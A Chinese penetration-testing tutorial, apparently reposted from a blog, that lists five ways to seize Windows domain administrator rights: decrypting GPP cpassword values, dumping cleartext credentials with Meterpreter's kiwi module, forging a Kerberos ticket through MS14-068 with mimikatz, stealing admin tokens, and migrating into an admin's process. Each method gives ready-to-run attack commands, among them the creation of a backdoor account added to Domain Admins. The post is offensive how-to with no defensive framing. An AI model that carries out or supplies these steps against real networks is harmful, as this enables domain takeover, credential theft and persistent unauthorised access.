获取域管理员权限的几种方式

文章来Bypass

在不考虑直接攻击域控的情况下,如何快速获取域管理员权限呢?

在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限。本文分享几种常见的获取域管理员权限的方式。


第1种方式:利用GPP漏洞获取域管理权限

SYSVOL是域内的共享文件夹,用来存放登录脚本、组策略脚本等信息。当域管理员通过组策略修改密码时,在脚本中引入用户密码,就可能导致安全问题。

(1)访问SYSVOL共享文件夹,搜索包含“cpassword”的XML文件,获取AES加密的密码。

(2)使用kali自带的gpp-decrypt进行破解,从而获取域账号密码,直接登录域管理员账号获取访问权限。

第2种方式:获取服务器明文登录密码

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter > getuidServer username: BYPASS-E97BA3FC\Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM

加载kiwi模块

load kiwi

列举系统中的明文密码

creds_all

第3种方式:使用MS14-068漏洞进行提权

MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

攻击流程:

第一步:利用MS14-068伪造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书

mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操作。

PsExec.exe \\dc cmd.exe
// 添加test用户net user test abc123! /add /domain// 把 test 用户添加进域管理员组net group 'domain admins' test /add /domain// 查看域管理员net group 'domain admins' /domain

第4种方式:窃取域管理员令牌

当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限。

1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。

2、直接在meterpreter shell上执行添加域管理员

add_user test abc123! -h 域控的IP地址add_group_user 'Domain Admins' test -h 域控IP地址

第5种方式:进程迁移

入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。

1、获取域管理员列表

net group 'Domain Admins' /domain

2、利用ps找到域管理员(TEST\bypass)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。如下图所示:

3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:

// 添加test用户net user test admin@123 /add /domain// 把 test 用户添加进域管理员组net group 'domain admins' test /add /domain

4、成功添加了域管理员账号test。

(0)

相关推荐

  • 50H($SECURITY

    50H属性结构 50H类型属性即$SECURITY_DESCRIPTOR属性,也就是安全描述符,主要用于保护文件以防止没有授权的访问,但Windows 2000/XP中已将安全描述符存放在$Secur ...

  • 网络安全的 10 个步骤之身份鉴别和访问控制

    控制谁和什么可以访问系统和数据. 需要保护对数据.系统和服务的访问.了解谁或什么需要访问,以及在什么条件下,与了解谁需要被排除在外同样重要.必须选择适当的方法来建立和证明用户.设备或系统的身份,并有足 ...

  • Windows应急响应和系统加固(3)——Windows操作系统的帐号角色权限

    Windows操作系统的帐号角色权限 1.Windows操作系统的帐户: • Windows操作系统好比一间富丽堂皇的宫殿,大门的门锁是身份和权限鉴别器,到访人员是账户,钥匙是验证其身份和权限的措施. ...

  • PQ-数据获取1:Excel文件数据源获取(导入)的几种方式

    一.      当前Excel文件--[从表格]导入 当前Excel工作簿的数据导入主要采用[从表格]的方式,如下图: 二.      外部Excel文件--[从文件]导入 非当前工作簿的数据导入主要 ...

  • win10如何获取超级管理员权限

    是否是专业版本的系统,打开组策略,定位到windows设置-安全设置-本地策略-安全选项,将"以管理员批准模式运行所有管理员"以及紧接着的下面的一项开启,即是和内置的adminis ...

  • iframe跨域-Js通信的一种方式

    向外通知: iframe外监听: window.addEventListener('message',function(e){ var data = e.data; console.log(data. ...

  • 获取用户:常见的5种裂变方式

    诸葛君说:随着获取流量的成本越来越高,各大企业都在寻找低成本获取流量的方法,其中最有效,也是最热的方式之一就是裂变,利用裂变的力量,可快速实现一分二,二分四的传播效果,而且通过裂变产生的新用户,他们的 ...

  • SpringBoot 中实现跨域的5种方式

    一.为什么会出现跨域问题 出于浏览器的同源策略限制.同源策略(Sameoriginpolicy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响. ...

  • 电脑获取手机文件的一种方式(通过手机建立ftp)

    电脑获取手机文件的一种方式(通过手机建立ftp)

  • 世上获取财富的三种方式,财富进阶之路是怎么走的

    财富篇之三 获取财富的方式 世界上,有三种获取财富的路子.分别是出卖体力换取财富,冒风险交易换取财富,还有一个是分配所得. 本文主要讲前面两个,因为分配不属于经济领域,在另外一个领域范围的,就不在这里 ...

  • 使用IDM获取视频素材的两种方式

    短视频已经成为了现在人们打发时间的一种方式,越来越多的短视频作者开始在各个平台发布自己的创意视频.如果你也想成为一门专业的短视频作者,那么优质的视频内容是必须的,而优质的内容背后是优质的素材.如果你在 ...

  • Stata:获取分组回归系数的三种方式

    于颂阳(中山大学) 邮箱:nkyusongyang@163.com 目录 1. runby 命令 1.1 命令简介 1.2 实例:使用 runby 命令获得分组统计量和回归估计系数 2. asreg ...